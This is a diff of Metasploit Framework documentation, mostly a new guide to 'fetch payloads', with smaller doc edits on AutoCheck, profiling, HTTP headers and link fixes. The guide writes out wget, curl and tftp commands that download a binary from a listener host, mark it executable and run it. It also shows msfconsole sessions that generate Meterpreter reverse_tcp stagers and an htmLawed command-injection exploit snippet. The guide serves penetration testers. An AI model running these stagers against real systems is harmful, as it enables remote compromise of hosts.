+fetch -qo /tmp/UGWuPPcy http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/UGWuPPcy;/tmp/UGWuPPcy;rm -f /tmp/UGWuPPcy
+```
 To use the fetch stager, either specify your CmdStagerFlavor in the metadata:

 ```ruby
@@ -0,0 +1,333 @@
+# Fetch Payloads
+
+## What Are Fetch Payloads?
+Fetch payloads are adapted, command-based payloads use network-enabled binaries on a remote host to download binary 
+payloads to that remote host.  Adapted payloads are just payloads where we have bolted an extra feature on top of
+existing payloads to modify the behavior.  In this case, you can still use all your favorite binary payloads and
+transports, but we've added an optional fetch payload adapter on top to stage the payloads using a networking binary and
+server.  They function similarly to some Command Stagers, but are based on the payload side rather than the exploit side
+to simplify integration and portability.  Fetch payloads are a fast, easy way to get a session on a target that has a
+command injection or code execution vulnerability *and* a known binary with the ability to download and store
+a file.
+
+## Terminology
+In the following documentation, it is useful to agree on certain terms to use so we don't get confused or confusing.
+`Fetch Payload` - The command to execute on the remote host to retrieve and execute the `Served Payload`
+`Fetch Binary` - The binary we are using on the remote host to download the Served Payload.  Examples might be WGET,
+cURL, or Certutil.
+`Fetch Protocol` - The protocol used to download the served payload, for example HTTP, HTTPS or TFTP.
+`Fetch Listener` - The server hosting the served payload.
+`Fetch Handler` - The same as `Fetch Listener`
+`Served Payload` - The underlying payload we want to execute.  We also might call this the `Adapted Payload`.
+`Served Payload Handler` -  The handler for the served payload. This is just a standard payload like 
+`meterpreter/reverse_tcp` or `shell_reverse_tcp`.
+
+## Organization
+Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support
+HTTP, HTTPS, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
+remote host to download the served payload prior to execution.
+
+Here is the naming convention for fetch payloads:
+`<cmd>/<platform>/<fetch protocol>/served_payload`
+For example:
+`cmd/linux/https/x64/meterpreter/reverse_tcp` Will do four things:
+1) Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
+2) Serve the above served payload on an HTTPS server
+3) Start a served payload handler for the served payload to call back to
+4) Generate a command to execute on a remote host that will download the served payload and run it.
+
+
+## A Simple Stand-Alone Example
+The fastest way to understand Fetch Payloads is to use them and examine the output. For example, let's assume a Linux
+target with the ability to connect back to us with  an HTTP connection and a command execution vulnerability.
+First, let's look at the payload in isolation:
+```msf
+msf6 exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options
+
+Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+FETCH_FILENAME      YXeSdwsoEfOH     no        Name to use on remote system when storing payload
+FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
+FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+FETCH_URIPATH                        no        Local URI to use for serving payload
+FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload
+LHOST                                yes       The listen address (an interface may be specified)
+LPORT               4444             yes       The listen port
+
+
+View the full module info with the info, or info -d command.
+
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+```
+
+### Options
+`FETCH_COMMAND` is the binary we wish to run on the remote host to download the adapted payload.  Currently, the
+supported options are `CURL FTP TFTP TNFTP WGET` on Linux hosts and `CURL TFTP CERTUTIL` on Windows hosts.  We'll get
+into more details on the binaries later.
+`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
+supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+`FETCH_SRVHOST` is the IP where the server will listen.
+`FETCH_SRVPORT` is the port where the server will listen.
+`FETCH_URIPATH` is the URI corresponding to the payload file.  The default value is deterministic based on the
+underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying
+served payload is the same.
+`FETCH_WRITABLE_DIR` is the directory on the remote host where we'd like to store the served payload prior to execution.
+This value is not supported by all binaries.  If you set this value and it is not supported, it will generate an error.
+
+The remaining options will be the options available to you in the served payload; in this case our served payload is
+`linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`.  If we had selected a different
+payload, we would see different options.
+
+### Generating the Fetch Payload
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
+FETCH_COMMAND => WGET
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
+FETCH_SRVHOST => 10.5.135.201
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
+FETCH_SRVPORT => 8000
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
+LHOST => 10.5.135.201
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
+LPORT => 4567
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
+wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+```
+
+You can see the fetch payload generated:
+`wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &`
+This command downloads the served payload, marks it as executable, and then executes it on the remote host.
+
+### Starting the Fetch Server
+When you start the `Fetch Handler`, it starts both the server hosting the binary payload *and* the listener for the
+served payload.  With `verbose` set to `true`, you can see both the Fetch Handler and the Served Payload Handler are
+started:
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
+[*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &
+[*] Payload Handler Started as Job 0
+[*] Fetch Handler listening on 10.5.135.201:8000
+[*] http server started
+[*] Started reverse TCP handler on 10.5.135.201:4567 
+```
+
+### Fetch Handlers and Served Payload Handlers
+The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under
+`Jobs`, even though the Fetch Handler is listening:
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l
+
+Jobs
+====
+
+  Id  Name                    Payload                                     Payload opts
+  --  ----                    -------                                     ------------
+  0   Exploit: multi/handler  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4567
+
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+[*] exec: netstat -ant | grep 8000
+
+tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN     
+
+```
+Killing the Served Payload handler will kill the Fetch Handler as well:
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
+[*] Stopping the following job(s): 0
+[*] Stopping job 0
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+[*] exec: netstat -ant | grep 8000
+
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+```
+
+## Using Fetch Payloads on the Fly
+One really nice thing about Fetch Payloads is that it gives you the ability to execute a binary payload very quickly,
+without relying on a session in framework or having to get a payload on target.  If you have a shell session or even a
+really odd situation where you can execute commands, you can get a session in framework quickly without having to upload
+a payload manually.  Just follow the steps above, and run the provided command.  Right now, the only thing we serve are
+Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.
+
+## Using it in an exploit
+Using Fetch Payloads is no different than using any other command payload.  First, give users access to the Fetch
+payloads for a given platform by adding a target that supports `ARCH_CMD` and the desired platform, either `windows` or
+`linux`.  Once the target has been added, you can get access to the command by invoking `payload.encoded` and use it as
+the command to execute on the remote target.
+
+### Example paired with CmdStager
+There is likely to be some overlap between fetch payloads and command stagers.  Let's talk briefly about how to support 
+both in an exploit.  Please see the documentation on Command Stagers for required imports and specifics for command
+stagers.  in this case, I'm only documenting the changes to make so that fetch payloads will work alongside command
+stagers or to use fetch payloads in the style of command stagers, which I suggest you do.
+
+In this case, I've modified the code provided in the command stager documentation to support both linux and unix command
+payloads.  All I did was give an array value for the `Platform` value and change the`Type` to something more generic:
+``` ruby
+'Targets'   =>
+  [
+    [ 'Linux Command',
+      {
+        'Arch' => [ ARCH_CMD ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Type' => :nix_cmd
+      }
+    ]
+  ]
+```
+
+For the `execute_command` method, nothing changes:
+
+``` ruby
+def execute_command(cmd, _opts = {})
+populate_values if @sid.nil? || @token.nil?
+uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'cookie' => 'sid=' + @sid,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'encode_params' => true,
+      'vars_post' => {
+        'token' => @token,
+        'text' => cmd,
+        'hhook' => 'exec',
+        'sid' => @sid
+      }
+    })
+end
+```
+
+The only change in the exploit method is the use of the more generic `Type` value in the case statement.  Nothing else
+needs to change.
+
+``` ruby
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+```
+
+If you have an exploit that already supports Unix Command payloads and you'd like it to support Linux Command payloads
+like Fetch Payloads, you can simply add the `linux` value to the platform array:
+
+``` ruby
+'Nix Command',
+  {
+    'Platform' => [ 'unix', 'linux' ],
+    'Arch' => ARCH_CMD,
+    'Type' => :unix_cmd,
+  }
+```
+
+## Supported Commands
+### Windows And Linux Both
+#### `CURL` 
+cURL comes pre-installed on Windows 10 and 11, and it is incredibly common on linux platforms and the options are very
+standardized across releases and platforms.  This makes cURL a good default choice for both Linux and Windows 
+targets.  All options and server protocol types are supported by the cURL command.
+
+#### `TFTP` 
+The TFTP binary is useful only in edge cases because of a long list of limitations:
+1) It is a Windows feature, but it is turned off by default on Windows Vista and later.
+2) While you are likely to find it on Linux and Unix hosts, the options are not standard across releases.
+3) The TFTP binary included in many Linux systems and all Windows systems does not allow for the port to be configured,
+nor does it allow for the destination filename to be configured, so `FETCH_SRVPORT` must always be set to 69 and 
+`FETCH_WRITABLE_DIR` and `FETCH_FILENAME` must be empty.  Listening on port 69 in Framework can be problematic, so I
+suggest that you use the advanced option `FetchListenerBindPort` to start the server on a different port and redirect
+the connection with a tool like iptables to a high port.
+For example, if you are on a linux host with iptables, you can execute the following commands to redirect a connection
+on UDP port 69 to UDP port 3069:
+`sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069`
+`sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069`
+Then, you can set `FetchListenerBindPort` to 3069 and get the callback correctly.
+4) Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time you
+start a tftp fetch handler, a new service will start:
+```msf
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+
+Jobs
+====
+
+  Id  Name                    Payload                                       Payload opts
+  --  ----                    -------                                       ------------
+  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
+
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
+LPORT => 4445
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+
+[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe
+[*] Payload Handler Started as Job 4
+
+[*] starting tftpserver on 10.5.135.201:8080
+[*] Started reverse TCP handler on 10.5.135.201:4445 
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+
+Jobs
+====
+
+  Id  Name                    Payload                                       Payload opts
+  --  ----                    -------                                       ------------
+  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
+  4   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4445
+
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+[*] exec: netstat -an | grep 8080
+
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
+FETCH_URIPATH => test4
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
+LPORT => 8547
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+
+[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe
+[*] Payload Handler Started as Job 5
+
+[*] starting tftpserver on 10.5.135.201:8080
+[*] Started reverse TCP handler on 10.5.135.201:8547 
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+[*] exec: netstat -an | grep 8080
+
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+
+```
+There is nothing to stop you from creating a race condition by starting multiple tftp servers with the same IP, port,
+and `FETCH_URI` value but serving different payloads.  This will result in a race condition where the payload served is
+non-deterministic.
+
+
+### Windows Only
+#### `Certutil`
+Certutil is a great choice for Windows targets- it is likely to be present on most recent releases of Windows and is 
+highly configurable.  The one troublesome aspect is that there is no insecure mode for Certutil, so if you are using
+Certutil with the HTTPS protocol, the certificate must be correct and checked.  It supports `HTTP` and `HTTPS`
+protocols.
+
+### Linux Only
+#### `FTP`
+FTP is an old but useful binary.  While we support using the FTP binary, we do not have an FTP server.  Modern releases
+of FTP support both HTTP and HTTPS protocols.  Unfortunately, we only support these modern versions of inline FTP, so it
+may not be appropriate for older systems. 
+
+#### `TNFTP`
+TNFTP (not to be confused with TFTP) is a newer version of FTP.  It is exactly the same as modern FTP, but sometimes both the legacy FTP and TNFTP are
+present on a system, so the command will be `tnftp` rather than `ftp`.
+
+#### WGET
+WGET is likely the first choice for a linux-only target.  It supports both HTTPS and HTTP and all Fetch payload options.
+It is ubiquitous on Linux hosts and very standard, making it an excellent choice.
@@ -127,4 +127,28 @@ def check
 end
 ```

-Another possible way to inspect is grab the vulnerable file, and use Metasm. But of course, this is a lot slower and generates more network traffic.
+Another possible way to inspect is grab the vulnerable file, and use Metasm. But of course, this is a lot slower and generates more network traffic.
+
+
+## AutoCheck Mixin
+
+Metasploit offers the possibility to automatically call the `check` method before the `exploit` or `run` method is run. Just prepend the `AutoCheck` module for this, nothing more:
+
+```ruby
+  prepend Msf::Exploit::Remote::AutoCheck
+```
+
+According to the `CheckCode` returned by the `check` method, Framework will decided if the module should be executed or not:
+
+| Checkcode | Module executed? |
+| --------- | ----------- |
+| **Exploit::CheckCode::Vulnerable** | yes |
+| **Exploit::CheckCode::Appears** | yes |
+| **Exploit::CheckCode::Detected** | yes |
+| **Exploit::CheckCode::Safe** | no |
+| **Exploit::CheckCode::Unsupported** | no |
+| **Exploit::CheckCode::Unknown** | no |
+
+This mixin brings two new options that let the operator control its behavior:
+- `AutoCheck`: Sets whether or not the `check` method will be run. Default is `true`.
+- `ForceExploit`: Override the check result. The `check` method is run but the module will be executed regardless of the result. Default is `false`.
@@ -198,7 +198,7 @@ Filling in the blanks (provided by the original PR's information from GitHub) ge
 https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict
 ````

-I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once @schierlm landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.
+I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.

 # Collaboration between contributors

@@ -206,7 +206,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch

 # Landing to upstream

-Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else (@jlee-r7) was able to to do something like this:
+Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:

 ````
 $ git fetch upstream
@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.

 # Questions and Corrections

-Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
+Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
@@ -20,7 +20,7 @@ Tools like Veil, pwnlib, etc. have for a long time used native compilers and too

 ### Native first-class UUID-aware, async stager payload

-Make a new async payload type (based on pingback payload work) making secure comms, endpoint verification, and async communication first-class citizens, and on by default. These session types would support a much more limited set of actions than Meterpreter, only supporting sleep/upload/download/stage, but would be upgraded to Meterpreter directly as-needed (maybe even transparently). Network protocols can be much more exotic for this, and the listener/payload should be usable externally from Metasploit as well. Todo: pull in async payload proposal notes from @bwatters-r7.
+Make a new async payload type (based on pingback payload work) making secure comms, endpoint verification, and async communication first-class citizens, and on by default. These session types would support a much more limited set of actions than Meterpreter, only supporting sleep/upload/download/stage, but would be upgraded to Meterpreter directly as-needed (maybe even transparently). Network protocols can be much more exotic for this, and the listener/payload should be usable externally from Metasploit as well. Todo: pull in async payload proposal notes from [@bwatters-r7](https://github.com/bwatters-r7).

 ## Module Interface

@@ -0,0 +1,56 @@
+Metasploit has inbuilt tooling for measuring the performance of commands and generating CPU/memory reports after msfconsole or msfvenom is closed.
+
+### Measuring CPU/memory
+
+You can measure CPU/memory usage when starting msfconsole/msfvenom with environment variables:
+
+```
+METASPLOIT_CPU_PROFILE=true ./msfconsole -x 'exit'
+METASPLOIT_MEMORY_PROFILE=true ./msfconsole -x 'exit'
+```
+
+Granular CPU/memory performance can be recorded using Ruby blocks: 
+
+```ruby
+Metasploit::Framework::Profiler.record_cpu do
+  # ...
+end
+```
+
+```ruby
+Metasploit::Framework::Profiler.record_memory do
+  # ...
+end
+```
+
+In both scenarios, reports will be generated and written to disk that can be opened in a file editor/browser.
+
+### Measuring command performance
+
+The `time` command in msfconsole can be used to record the performance of a command:
+
+```msf
+msf6 exploit(windows/smb/ms17_010_psexec) > time reload
+[*] Reloading module...
+[+] Command "reload" completed in 0.20876399998087436 seconds
+```
+
+It is possible to record CPU and memory usage with the `--memory` and `--cpu` flags:
+
+```msf
+msf6 exploit(windows/smb/ms17_010_psexec) > time --cpu search smb
+... etc ...
+Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu
+[+] Command "search smb" completed in 0.4150249999947846 seconds
+```
+
+Examples:
+
+```
+time
+time -h
+time --help
+time search smb
+time --memory search smb
+time --cpu search smb
+```
@@ -159,3 +159,30 @@ Module advanced options (auxiliary/scanner/http/title):
   VERBOSE               false                                              no        Enable detailed status messages
   WORKSPACE                                                                no        Specify the workspace for this module
 ```
+
+### HTTP Multiple-Headers
+Additional headers can be set via the `HTTPRawHeaders` option.
+A file containing a ERB template will be used to append to the headers section of the HTTP request.
+An example of an ERB template file is shown below.
+```
+Header-Name-Here: <%= 'content of header goes here' %>
+```
+
+The following output shows leveraging the scraper scanner module with an additional header stored in ```additional_headers.txt```.
+```msf
+msf6 auxiliary(scanner/http/scraper) > cat additional_headers.txt
+[*] exec: cat additional_headers.txt
+
+X-Cookie-Header: <%= 'example-cookie' %>
+msf6 auxiliary(scanner/http/scraper) > set HTTPRAWHEADERS additional_headers.txt
+HTTPRAWHEADERS => additional_headers.txt
+msf6 auxiliary(scanner/http/scraper) > exploit
+
+####################
+# Request:
+####################
+GET / HTTP/1.0
+Host: 172.16.0.63:8000
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
+X-Cookie-Header: example-cookie
+```
@@ -147,7 +147,7 @@ Open a WinRM session:

 ```msf
 msf6 > use auxiliary/scanner/winrm/winrm_login
-msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd win::rmauth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
+msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

 [+] 192.168.123.13:88 - Received a valid TGT-Response
 [*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
@@ -1,4 +1,4 @@
-The Loginpalooza contest is over! Congrats and thanks to @TomSellers, @ChrisTuncer, and @0a2940!
+The Loginpalooza contest is over! Congrats and thanks to [@TomSellers](https://github.com/TomSellers), [@ChrisTruncer](https://github.com/ChrisTruncer), and [@0a2940](https://github.com/0a2940)!

 The list of [modules to refactor](#modules-to-refactor) is still here. Modules that get refactored should be removed from the list entirely.

@@ -115,4 +115,4 @@ If you'd like to learn how to convert your favorite existing module, or write a
 - [ ]
  [post/windows/gather/enum_domains.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/windows/gather/enum_domains.rb) - Creates realms
 - [ ]
-  [post/windows/gather/enum_logged_on_users.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/windows/gather/enum_logged_on_users.rb) - Creates publics but not privates
+  [post/windows/gather/enum_logged_on_users.rb](https://github.com/rapid7/metasploit-framework/tree/master/modules/post/windows/gather/enum_logged_on_users.rb) - Creates publics but not privates
@@ -83,7 +83,7 @@ php shell_http.php

 ```
 use windows/x64/meterpreter_reverse_tcp
-generate -f exe -o shell.exe MeterpreterDebugBuild=true MeterpreterDebugLogging='rpath:C:/test/foo.txt'
+generate -f exe -o shell.exe MeterpreterDebugBuild=true MeterpreterDebugLogging='rpath:C:/Windows/Temp/foo.txt'

 to_handler
 ```
@@ -12,7 +12,7 @@ The Meterpreter that we have known and loved for years has always had the abilit

 Recent modifications to Meterpreter have changed this. Meterpreter has a new [[configuration system|Meterpreter-Configuration]] that supports multiple transports and it now supports the addition of new transports while the session is still running. With the extra transports configured, Meterpreter allows the user to cycle through those transports without shutting down the session.

-Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [Meterpreter Reliable Network Communication][].
+Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [[Meterpreter Reliable Network Communication|[[reliable network communication documentation|./Meterpreter-Reliable-Network-Communication.md]].

 This document describes how multiple transports are added to an existing Meterpreter session.

@@ -78,7 +78,7 @@ The first part of the output is the session expiry time. To learn more about exp

 The above output shows that we have one transport enabled that is using `TCP`. We can infer that the transport was a `reverse_tcp` (rather than `bind_tcp`) due to the fact that there is a host IP address in the transport URL. If it was a `bind_tcp`, this would be blank.

-`Comms T/O` refers to the communications timeout value. `Retry Total` is the total time to attempt reconnects on this transport, and `Retry Wait` indicates how often a retry of the current transport should happen. Each of these is documented in depth in the [Timeout documentation][].
+`Comms T/O` refers to the communications timeout value. `Retry Total` is the total time to attempt reconnects on this transport, and `Retry Wait` indicates how often a retry of the current transport should happen. Each of these is documented in depth in the [[Timeout documentation|./meterpreter-timeout-control.md]].

 The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:

@@ -362,6 +362,3 @@ The following Meterpreter implementations currently support the transport comman
 * Android
 * Java
 * Python
-
-  [Timeout documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html
-  [Reliable Network documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html
@@ -2,7 +2,7 @@

 There are currently {{ site.metasploit_total_module_count }} Metasploit modules:

-{{ site.metasploit_nested_module_counts | module_tree }}
+{{ site.metasploit_nested_module_counts | module_tree: "All Modules", true }}

 ## Module types

@@ -20,7 +20,7 @@ Linux packages are built nightly for .deb (i386, amd64, armhf, arm64) and .rpm (

 ### macOS manual installation

-The latest OS X installer package can also be downloaded directly here: <https://osx.metasploit.com/metasploitframework-latest.pkg>, with the last 10 builds archived at <https://osx.metasploit.com/>. Simply download and launch the installer to install Metaploit Framework with all of its dependencies.
+The latest OS X installer package can also be downloaded directly here: <https://osx.metasploit.com/metasploitframework-latest.pkg>, with the last 8 builds archived at <https://osx.metasploit.com/>. Simply download and launch the installer to install Metasploit Framework with all of its dependencies.

 ## Installing Metasploit on Windows

@@ -232,7 +232,7 @@ The full list of available functions is as follows:
 #### meterpreter.transport

 * `meterpreter.transport.list()` - list all transports in the target.
-* `meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash)` - allows for transports to be added to the Meterpreter session. All but the `url` parameter come with a sane default. Full details of each of these parameters can be found in the [transport][] documentation.
+* `meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash)` - allows for transports to be added to the Meterpreter session. All but the `url` parameter come with a sane default. Full details of each of these parameters can be found in the [[transport|meterpreter-transport-control]] documentation.

 It is not possible to delete transports using the python extension as this opens the door to many kinds of failure.

@@ -331,7 +331,6 @@ Hell no! But the goal is to get closer and closer to perfect as we go. It's up t

 Please do, making good use of the Github issues feature. Better still, create a PR for one!

-  [transport]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html
  [inveigh]: https://github.com/Kevin-Robertson/Inveigh

 ## Currently Loadable Native Libraries
@@ -1,4 +1,4 @@
-SQL Injection library support was added in 2020 by @red0xff during the Google Summer of Code.
+SQL Injection library support was added in 2020 by [@red0xff](https://github.com/red0xff)  during the Google Summer of Code.

 ## Supported Databases

@@ -6,7 +6,7 @@ The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and

 The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.

-[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [Paranoid Mode][] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.
+[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.

 For applications such as this, [WinHTTP][] is the "preferred" option as deemed by Microsoft. This API is designed to work under a service, and provides a greater number of ways to interact with communications made over HTTP/S. With this API it was trivial to implement the SHA1 hash verification and force Meterpreter to shut down when a MITM is detected.

@@ -61,5 +61,4 @@ HTTP/S communications in Windows is a hairy beast, and trying to cater for all c
  [WinInet]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa383630%28v=vs.85%29.aspx
  [WinHTTP]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
  [winhttp_wininet]: https://msdn.microsoft.com/en-us/library/windows/desktop/hh227298%28v=vs.85%29.aspx
-  [Paranoid Mode]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
-  [OJ]: https://github.com/OJ
+  [OJ]: https://github.com/OJ
@@ -2,7 +2,6 @@

 Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:

-* <https://tryhackme.com/room/rpmetasploit>
 * <http://www.offensive-security.com/metasploit-unleashed/Main_Page>
 * <https://metasploit.help.rapid7.com/docs/>
 * <https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/>
@@ -169,6 +169,99 @@ if __name__ == '__main__':
 ```
 The example sends a get request to the given `rhost` and `targeturi`, then calls `logging.info()` on the result to have the output displayed in msfconsole.

+### Debugging Python modules
+
+If you want to run an external module as a standalone program from your metasploit-framework folder just specify the Python path to include
+the Metasploit library support and run the module directly:
+
+```
+$ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py
+```
+
